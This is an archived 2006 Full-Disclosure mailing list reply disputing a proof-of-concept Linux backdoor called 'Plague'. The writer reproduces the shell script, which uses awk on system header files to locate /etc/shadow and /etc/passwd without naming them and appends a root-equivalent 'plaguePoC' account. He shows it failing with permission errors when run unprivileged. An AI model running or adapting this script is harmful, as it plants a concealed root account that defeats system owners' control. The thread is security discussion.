Date: Mon, 23 Oct 2006 13:59:58 +0300 (EEST)
From: hijacker@...um.net
To: "Andrew Farmer" <andfarm@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Plague Proof of Concept Linux backdoor

Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completly out of the subject and and the same time some of
which offensive to me!

Let's go into more detauls on that backdoor.

I created the file test1.sh containing:

hijacker@hpa:~/hacki$ cat test1.sh
#!/bin/sh
if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2

fi

Then I chmod 700 test1.sh
then I run:

hijacker@hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied

Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

Thanks,
-Nikolay Kichukov